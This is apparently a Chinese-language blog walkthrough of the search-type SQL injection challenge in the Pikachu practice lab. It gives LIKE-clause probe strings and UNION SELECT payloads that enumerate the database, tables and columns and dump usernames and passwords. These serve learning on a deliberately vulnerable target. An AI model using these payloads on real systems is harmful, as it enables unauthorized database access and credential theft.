Pikachu靶场-SQL注入-搜索型注入过关步骤

首先要明白MySQL数据库模糊搜索的语句,like ‘常%’、like ‘%常’、like ‘%常%’ 这个几个,这里就不详说这个语句了

判断注入点

不知道怎么写的代码以下几种语句都可以试试

这关我用的搜索型注入语句:
v%’ and -1=-1 – bbq

网上查到的搜索型注入语句:
‘and 1=1 and ‘%’=’

%’ and 1=1–’

%’ and 1=1 and ‘%’=’
单引号闭合的时候报了一个错误,这说明大概是 %xx%、xx%吧

直接上过程动图吧,看不清点击图片放大查看:

判断有多少个字段数

这关有4个,直接上动图:

展示显错位

查询当前数据库

version()查看数据库版本 ,database()查看当前数据库

v%' union select version(),database(),33 -- bbq

查询出数据库中的所有表

如果表多页面展示不全,可以使用 LIMIT 一页页展示,也可以使用group_concat() 拼接函数将显示的字段名包起来展示

v%' union select table_name,22,33 from information_schema.tables where table_schema=database() -- bbq

查询指定的表中的列名

查询出表名下一步就是,查询字段也就是列名称

v%' union select column_name,22,33 from information_schema.columns where table_schema='pikachu' and table_name='users' -- bbq

查询数据

当经过以上步骤,已经知道了数据库名、表名、字段名,那么就可以查询我们需要的数据了

v%' union select username,password,33 from users -- bbq

Pikachu靶场-SQL注入-搜索型注入过关步骤相关推荐

  1. Pikachu靶场—sql注入通关

    Pikachu靶场-SQL注入篇 前言 一.数字型注入 二.字符型注入 三.搜索型注入 四.XX型注入 五.insert注入 六.delete注入 七.http header注入 八.盲注:基于布尔盲 ...

  2. Pikachu靶场-SQL Inject

    Pikachu靶场-SQL Inject SQL Inject 漏洞原理概述 SQL Inject攻击流程 如何判断是否存在注入 如何判断注入点类型及常见注入类型 数字型 字符型 搜索型 XX型 SQ ...

  3. pikachu靶场SQL,sqlmap解法

    GET型输入 字符型注入(此处细说): 随便输入点什么 URL http://192.168.56.1/pikachu2/vul/sqli/sqli_str.php?name=2121&sub ...

  4. SQL注入:搜索型注入

    like语法 "%"匹配任何字符,  "like"的意思就是像,  "$" 变量 SQL语句:select username,id from ...

  5. SQL注入-整型注入实例

    发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占 ...

  6. pikachu靶场通关之sql注入系列

    目录 一.前置知识 二.SQL注入 三. 注入的一般方法 1. 手动注入 (1)联合查询union注入: (2)基于报错信息注入: (3)盲注: 2. 使用sqlmap注入 (1) 前置知识 (2) ...

  7. SQL注入之MySQL注入学习笔记(二)

    补充:MySQL注释方法 文章目录 MySQL注入 基本介绍 字符型 数字型 搜索型 Cookie注入 HTTP头注入 具体实例 数字型注入 一般类型 被单引号包裹起来的 双引号加小括号包裹 两个括号 ...

  8. pikachu靶场通关指南

    靶场搭建 docker搭建 docker pull area39/pikachu docker run -itd -p 80:80 -p 3306:3306 --name "p1" ...

  9. Pikachu靶场全关攻略(超详细!)

    一.靶场搭建 准备工具 phpstudy **pikachu靶场下载地址:**https://github.com/zhuifengshaonianhanlu/pikachu 搭建过程 将靶场文件夹放 ...

最新文章

  1. SAP MM VL34事务代码批量创建Inbound Delivery
  2. gnu linux mysql下载_linux下的navicat for mysql下载
  3. zookepper 安装
  4. 华为云服务器配置ipv6,华为云获“IPv6支持度优秀奖”,持续助推云网融合
  5. wireshark windows版数据过滤插件安装及使用
  6. 小米11系列顶配版曝光:骁龙888加持 代号“star”!
  7. java glassfish_java - Tomcat,JBoss和Glassfish有什么区别?
  8. [Swust OJ 188]--异面空间(读懂题意很重要)
  9. Hyperledger Fabric教程(1)--Hyperledger Fabric 老版本 1.1.0 快速部署安装
  10. 广义积分中值定理的证明(柯西中值定理)
  11. 笔记本计算机bios设置,笔记本怎么进入bios设置【方法步骤】
  12. c 语言万年历 节日查询,C语言 程序设计 节日查询和任务提醒系统万年历.doc
  13. SAP资产负债表实现方案探索 - 基于 VBA 自定义函数方法
  14. 基于Qt ffmpeg opengl开发跨平台安卓实时投屏软件
  15. 二维码制作软件那个好用?
  16. 地方政府不愿房价下跌 救市或化解房地产调控
  17. 基于单片机的电子琴系统设计(#0424)
  18. 获取android 默认的机器人图标,APP桌面只显示默认机器人图标的几个解决方法
  19. 老师,强奸你时别叫痛(转载)
  20. 云与海计算机谱,天谕手游云与海乐谱_云与海乐谱代码分享_3DM手游

热门文章

  1. 【世界知识产权日】让区块链落地服务于网络知识产权
  2. 生产周期缩短42%,效率提升28%,申菱展示数据智能成绩单
  3. ARM的合法立即数与非法立即数
  4. hashcat 使用
  5. 计算机系学生未来憧憬,北京科技大学计算机与通信工程学院-脚踏实地,展望未来——计通学院2018级本科生年级会...
  6. 日内回转交易策略-股票
  7. “后疫情时代”的金融科技价值
  8. idea打开多个小窗口换行
  9. 项目经理面试时常见的18个问题及回答技巧
  10. 一文带你读懂,这三个交换机层级的区别和联系。